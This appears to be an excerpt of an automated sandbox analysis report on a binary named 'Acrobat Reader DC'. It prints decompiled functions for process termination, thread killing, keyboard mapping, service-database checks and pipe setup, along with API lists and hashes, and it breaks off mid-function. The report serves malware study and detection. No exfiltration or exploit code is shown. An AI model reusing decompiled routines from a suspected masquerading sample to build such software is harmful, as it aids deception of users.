                                  • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                  • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                  • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E00417082(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x48d0e8);
				E00416C70(__ebx, __edi, __esi);
				_t31 = E00417A69(__ebx, _t35);
				_t15 =  *0x490800; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E004182CB(_t25, _t31, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x490708; // 0xa52c70
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x4902e0;
								if(__eflags != 0) {
									E00413748(_t33);
								}
							}
						}
						_t21 =  *0x490708; // 0xa52c70
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x490708; // 0xa52c70
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E0041711D();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					_push(0x20);
					E00411924(_t29, _t38);
				}
				return E00416CB5(_t33);
			}










                                  0x00417082
                                  0x00417082
                                  0x00417082
                                  0x00417082
                                  0x00417084
                                  0x00417089
                                  0x00417093
                                  0x00417095
                                  0x0041709d
                                  0x004170be
                                  0x004170c4
                                  0x004170c8
                                  0x004170cb
                                  0x004170ce
                                  0x004170d4
                                  0x004170d6
                                  0x004170d8
                                  0x004170e1
                                  0x004170e3
                                  0x004170e5
                                  0x004170eb
                                  0x004170ee
                                  0x004170f3
                                  0x004170eb
                                  0x004170e3
                                  0x004170f4
                                  0x004170f9
                                  0x004170fc
                                  0x00417102
                                  0x00417106
                                  0x00417106
                                  0x0041710c
                                  0x00417113
                                  0x004170a5
                                  0x004170a5
                                  0x004170a5
                                  0x004170a8
                                  0x004170aa
                                  0x004170ac
                                  0x004170ae
                                  0x004170b3
                                  0x004170bb

                                  APIs
                                  • __getptd.LIBCMT ref: 0041708E
                                    • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                    • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                  • __amsg_exit.LIBCMT ref: 004170AE
                                  • __lock.LIBCMT ref: 004170BE
                                  • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                                  • _free.LIBCMT ref: 004170EE
                                  • InterlockedIncrement.KERNEL32(00A52C70), ref: 00417106
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                  • String ID:
                                  • API String ID: 3470314060-0
                                  • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                                  • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                                  • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410AB0 Relevance: 9.0, APIs: 6, Instructions: 40keyboardCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00410AB0(intOrPtr* __esi) {
				int _t20;

				 *__esi = 5;
				 *((intOrPtr*)(__esi + 4)) = 5;
				 *((short*)(__esi + 8)) = 1;
				 *((intOrPtr*)(__esi + 0x10)) = 0;
				 *((intOrPtr*)(__esi + 0x14)) = 0;
				 *((short*)(__esi + 0x18)) = 0;
				 *((intOrPtr*)(__esi + 0x1a)) = 0;
				 *((short*)(__esi + 0x1e)) = 0;
				 *((intOrPtr*)(__esi + 0xc)) = 4;
				 *((char*)(__esi + 0x29)) = MapVirtualKeyW(0x5b, 0);
				 *((char*)(__esi + 0x26)) = MapVirtualKeyW(0x10, 0);
				 *((char*)(__esi + 0x27)) = MapVirtualKeyW(0xa0, 0);
				 *((char*)(__esi + 0x28)) = MapVirtualKeyW(0xa1, 0);
				 *((char*)(__esi + 0x24)) = MapVirtualKeyW(0x11, 0);
				_t20 = MapVirtualKeyW(0x12, 0);
				 *(__esi + 0x25) = _t20;
				return _t20;
			}




                                  0x00410aba
                                  0x00410ac0
                                  0x00410ac7
                                  0x00410acd
                                  0x00410ad0
                                  0x00410ad3
                                  0x00410ad8
                                  0x00410adb
                                  0x00410ae1
                                  0x00410aed
                                  0x00410af8
                                  0x00410b03
                                  0x00410b0b
                                  0x00410b13
                                  0x00410b16
                                  0x00410b19
                                  0x00410b1d

                                  APIs
                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Virtual
                                  • String ID:
                                  • API String ID: 4278518827-0
                                  • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                  • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                  • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044B63B Relevance: 9.0, APIs: 6, Instructions: 40synchronizationthreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044B63B(intOrPtr _a4) {
				void* _t6;
				long _t8;
				LONG* _t13;
				intOrPtr _t17;
				struct _CRITICAL_SECTION* _t18;
				void** _t19;

				_t17 = _a4;
				_t19 = _t17 + 0x30;
				if( *(_t17 + 0x30) != 0) {
					_t13 = _t17 + 0x34;
					_t8 = InterlockedExchange(_t13,  *(_t17 + 0x34));
					if(_t8 != 0x1f6) {
						_t18 = _t17 + 0x14;
						EnterCriticalSection(_t18);
						TerminateThread( *_t19, 0x1f6);
						WaitForSingleObject( *_t19, 0x3e8);
						E00432614(_t19);
						_t8 = InterlockedExchange(_t13, 0x1f6);
						LeaveCriticalSection(_t18);
					}
					return _t8;
				}
				return _t6;
			}









                                  0x0044b640
                                  0x0044b647
                                  0x0044b64a
                                  0x0044b650
                                  0x0044b655
                                  0x0044b660
                                  0x0044b662
                                  0x0044b666
                                  0x0044b674
                                  0x0044b682
                                  0x0044b689
                                  0x0044b697
                                  0x0044b69e
                                  0x0044b69e
                                  0x00000000
                                  0x0044b6a4
                                  0x0044b6a8

                                  APIs
                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                  • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                    • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                  • String ID:
                                  • API String ID: 3495660284-0
                                  • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                  • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                  • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00433FCE Relevance: 9.0, APIs: 6, Instructions: 40windowtimethreadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00433FCE(struct HWND__* _a4) {
				long _v8;
				long _v12;
				long _t7;
				struct HWND__* _t14;
				void* _t15;

				_t14 = _a4;
				PostMessageW(_t14, 0x10, 0, 0);
				_t7 = SendMessageTimeoutW(_t14, 0x10, 0, 0, 2, 0x1f4,  &_v12);
				if(_t7 == 0) {
					GetWindowThreadProcessId(_t14,  &_v8);
					_t15 = OpenProcess(0x1f0fff, 0, _v8);
					TerminateProcess(_t15, 0);
					return CloseHandle(_t15);
				}
				return _t7;
			}








                                  0x00433fd5
                                  0x00433fdf
                                  0x00433ff7
                                  0x00433fff
                                  0x00434006
                                  0x0043401d
                                  0x00434022
                                  0x00000000
                                  0x00434029
                                  0x00434033

                                  APIs
                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00433FDF
                                  • SendMessageTimeoutW.USER32 ref: 00433FF7
                                  • GetWindowThreadProcessId.USER32(?,?), ref: 00434006
                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00434017
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00434022
                                  • CloseHandle.KERNEL32(00000000), ref: 00434029
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                  • String ID:
                                  • API String ID: 839392675-0
                                  • Opcode ID: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction ID: 6d7c31bbfa6b3b8114dad7b7c2ee08b650c76bc0f6a005f10e60d9b42b3e3825
                                  • Opcode Fuzzy Hash: 270ea397f99f845c81f96666f75a121d30ac61d95b76d5fc1fdfa9076574b2da
                                  • Instruction Fuzzy Hash: 90F01D75681218BBE6215BA09D0AFEE776CAF09B01F104569FF01B61C1E7F42A0247AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00432FEE Relevance: 9.0, APIs: 6, Instructions: 33serviceCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00432FEE() {
				void* _t3;
				void* _t9;
				void* _t11;

				_t9 = 0;
				_t11 = OpenSCManagerW(0, 0, 8);
				if(_t11 == 0) {
					L6:
					return _t9;
				} else {
					_t3 = LockServiceDatabase(_t11);
					if(_t3 == 0) {
						if(GetLastError() == 0x41f) {
							_t9 = 1;
						}
						CloseServiceHandle(_t11);
						goto L6;
					} else {
						UnlockServiceDatabase(_t3);
						CloseServiceHandle(_t11);
						return 1;
					}
				}
			}






                                  0x00432ff6
                                  0x00432ffe
                                  0x00433002
                                  0x0043303b
                                  0x0043303e
                                  0x00433004
                                  0x00433005
                                  0x0043300d
                                  0x0043302f
                                  0x00433031
                                  0x00433031
                                  0x00433034
                                  0x00000000
                                  0x0043300f
                                  0x00433010
                                  0x00433019
                                  0x00433023
                                  0x00433023
                                  0x0043300d

                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A90E8,14000000,0042E252), ref: 00432FF8
                                  • LockServiceDatabase.ADVAPI32(00000000), ref: 00433005
                                  • UnlockServiceDatabase.ADVAPI32(00000000), ref: 00433010
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433019
                                  • GetLastError.KERNEL32 ref: 00433024
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 00433034
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                  • String ID:
                                  • API String ID: 1690418490-0
                                  • Opcode ID: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction ID: 735ec6acd85acabf56193826cd071f2489ef818a13be6dc6b3d06c037ab4ab6a
                                  • Opcode Fuzzy Hash: 9e0ba4b1adc52d5e0b1b4f4059e6a78f5324ad2f54c459c37d760db65bd3d172
                                  • Instruction Fuzzy Hash: D5E065315822216BD6261B346E4DBCF37A8EB2F752F141827F701D6250CB998445D7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045FA41 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045FA41(void* __ecx, void* __eflags, intOrPtr _a4) {
				struct tagMENUITEMINFOW _v52;
				struct HMENU__* _v56;
				int _v60;
				int _v64;
				intOrPtr _v72;
				int _t42;
				signed int _t44;
				void* _t50;
				signed int _t55;
				struct HMENU__* _t61;
				int _t66;
				signed int* _t68;
				struct HMENU__** _t71;

				_t50 = __ecx;
				_v60 = 0xffffffff;
				if(E00434179(__ecx, _a4,  &_v60) == 0) {
					L18:
					__eflags = 0;
					return 0;
				} else {
					_t66 = _v60;
					if(_t66 < 7 || _t66 >  *((intOrPtr*)(_t50 + 0x9d0))) {
						goto L18;
					} else {
						_t71 =  *(_t50 + 0x1b4 + _t66 * 4);
						if(_t71[1] != 1) {
							L16:
							if(DeleteMenu( *_t71, _t66, 0) == 0) {
								goto L18;
							} else {
								 *_t71 = 0;
								_t71[1] = 0xff;
								E0040C600(_t33 | 0xffffffff,  &(_t71[2]), 0);
								E0044422D(_t50, _t66);
								return 1;
							}
						} else {
							_v52.cbSize = 0x30;
							E00412F40( &(_v52.fMask), 0, 0x2c);
							_v52.fMask = 4;
							if(GetMenuItemInfoW( *_t71, _t66, 0,  &_v52) == 0) {
								goto L18;
							} else {
								_t61 = _v52.hSubMenu;
								_t42 = 7;
								_v56 = _t61;
								_v64 = 7;
								if( *((intOrPtr*)(_t50 + 0x9d0)) >= 7) {
									_t18 = _t50 + 0x1d0; // 0x2cf
									_t68 = _t18;
									while(1) {
										_t55 =  *_t68;
										if(_t55 != 0 &&  *_t55 == _t61) {
											_t87 =  *((char*)(_t55 + 4)) - 1;
											if( *((char*)(_t55 + 4)) != 1) {
												DeleteMenu(_t61, _t42, 0);
												 *((char*)( *_t68 + 4)) = 0xff;
												 *( *_t68) = 0;
												_t44 =  *_t68;
												 *((char*)(_t44 + 5)) = 0;
												__eflags = _t44 | 0xffffffff;
												E0040C600(_t44 | 0xffffffff,  *_t68 + 8, 0);
												E0044422D(_t50, _v72);
											} else {
												E0045FA41(_t50, _t87, _t42);
											}
											_t42 = _v64;
										}
										_t42 = _t42 + 1;
										_t68 =  &(_t68[1]);
										_v64 = _t42;
										if(_t42 >  *((intOrPtr*)(_t50 + 0x9d0))) {
											break;
										}
										_t61 = _v56;
									}
									_t66 = _v60;
								}
								goto L16;
							}
						}
					}
				}
			}
















                                  0x0045fa4d
                                  0x0045fa59
                                  0x0045fa68
                                  0x0045fba1
                                  0x0045fba3
                                  0x0045fba9
                                  0x0045fa6e
                                  0x0045fa6e
                                  0x0045fa75
                                  0x00000000
                                  0x0045fa87
                                  0x0045fa87
                                  0x0045fa92
                                  0x0045fb62
                                  0x0045fb70
                                  0x00000000
                                  0x0045fb72
                                  0x0045fb72
                                  0x0045fb78
                                  0x0045fb87
                                  0x0045fb8e
                                  0x0045fb9e
                                  0x0045fb9e
                                  0x0045fa98
                                  0x0045faa1
                                  0x0045faa9
                                  0x0045fabc
                                  0x0045facc
                                  0x00000000
                                  0x0045fad2
                                  0x0045fad2
                                  0x0045fad6
                                  0x0045fadb
                                  0x0045fadf
                                  0x0045fae9
                                  0x0045faeb
                                  0x0045faeb
                                  0x0045faf7
                                  0x0045faf7
                                  0x0045fafb
                                  0x0045fb01
                                  0x0045fb05
                                  0x0045fb15
                                  0x0045fb1d
                                  0x0045fb23
                                  0x0045fb29
                                  0x0045fb2b
                                  0x0045fb37
                                  0x0045fb3a
                                  0x0045fb45
                                  0x0045fb07
                                  0x0045fb0a
                                  0x0045fb0a
                                  0x0045fb4a
                                  0x0045fb4a
                                  0x0045fb4e
                                  0x0045fb4f
                                  0x0045fb52
                                  0x0045fb5c
                                  0x00000000
                                  0x00000000
                                  0x0045faf3
                                  0x0045faf3
                                  0x0045fb5e
                                  0x0045fb5e
                                  0x00000000
                                  0x0045fae9
                                  0x0045facc
                                  0x0045fa92
                                  0x0045fa75

                                  APIs
                                  • _memset.LIBCMT ref: 0045FAA9
                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Menu$Delete$InfoItem_memset
                                  • String ID: 0
                                  • API String ID: 1173514356-4108050209
                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00443442(signed int* _a4, signed int _a8, long _a12, void* _a16, HANDLE* _a20) {
				struct _SECURITY_ATTRIBUTES _v16;
				signed int _t17;
				void* _t18;
				void* _t20;
				void* _t24;
				void* _t27;
				signed int _t28;
				long _t30;
				HANDLE* _t35;

				_t17 =  *_a4;
				_t30 = _a12;
				_t35 = _a16;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 0;
				_v16.lpSecurityDescriptor = 0;
				if((_t17 & 0x00000010) == 0) {
					if((_a8 & _t17) == 0) {
						_t18 = GetStdHandle(_t30);
						 *_t35 = _t18;
						if(_t18 == 0 || _t18 == 0xffffffff) {
							_t20 = CreateFileW("nul", 0x40000000, 2,  &_v16, 3, 0x80, 0);
							 *_t35 = _t20;
							if(_t20 == 0xffffffff || _t20 == 0) {
								goto L3;
							} else {
								goto L10;
							}
						} else {
							goto L2;
						}
					} else {
						_t27 =  *_t35;
						if(_t27 == 0) {
							_t28 = CreatePipe(_a20, _t35,  &_v16, 0);
							if(_t28 != 0) {
								L10:
								E004325E0( *_t35,  &_a16, 1);
								E00432614(_t35);
								_t24 = _a16;
								 *_t35 = _t24;
								return _t24;
							} else {
								return _t28 | 0xffffffff;
							}
						} else {
							return _t27;
						}
					}
				} else {
					_t18 = GetStdHandle(_t30);
					 *_t35 = _t18;
					if(_t18 == 0xffffffff) {
						L3:
						 *_t35 = 0;
						return  *_t35;
					} else {
						L2:
						E004325E0(_t18, _t35, 1);
						return  *_t35;
					}
				}
			}












                                  0x0044344b
                                  0x0044344d
                                  0x00443451
                                  0x00443454
                                  0x0044345b
                                  0x00443462
                                  0x0044346b
                                  0x00443524
                                  0x004434c3
                                  0x004434c9
                                  0x004434cd
                                  0x004434ed
                                  0x004434f3
                                  0x004434f8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00443526
                                  0x00443526
                                  0x0044352a
                                  0x004434ae
                                  0x004434b6
                                  0x004434fe
                                  0x00443507
                                  0x0044350d
                                  0x00443512
                                  0x00443518
                                  0x0044351e
                                  0x004434b8
                                  0x004434bf
                                  0x004434bf
                                  0x00443534
                                  0x00443534
                                  0x00443534
                                  0x0044352a
                                  0x00443471
                                  0x00443472
                                  0x00443478
                                  0x0044347d
                                  0x00443494
                                  0x00443494
                                  0x004434a0
                                  0x0044347f
                                  0x0044347f
                                  0x00443483
                                  0x00443491
                                  0x00443491
                                  0x0044347d

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Handle
                                  • String ID: nul
                                  • API String ID: 2519475695-2873401336
                                  • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                  • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                  • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0044334F(signed char* _a4, void* _a8, HANDLE* _a12) {
				struct _SECURITY_ATTRIBUTES _v16;
				signed char _t15;
				void* _t16;
				void* _t18;
				void* _t22;
				void* _t25;
				signed int _t26;
				HANDLE* _t32;

				_t15 =  *_a4;
				_t32 = _a8;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 0;
				_v16.lpSecurityDescriptor = 0;
				if((_t15 & 0x00000010) == 0) {
					if((_t15 & 0x00000001) == 0) {
						_t16 = GetStdHandle(0xfffffff6);
						 *_t32 = _t16;
						if(_t16 == 0 || _t16 == 0xffffffff) {
							_t18 = CreateFileW("nul", 0x80000000, 1,  &_v16, 3, 0x80, 0);
							 *_t32 = _t18;
							if(_t18 == 0xffffffff || _t18 == 0) {
								goto L3;
							} else {
								goto L10;
							}
						} else {
							goto L2;
						}
					} else {
						_t25 =  *_t32;
						if(_t25 == 0) {
							_t26 = CreatePipe(_t32, _a12,  &_v16, 0);
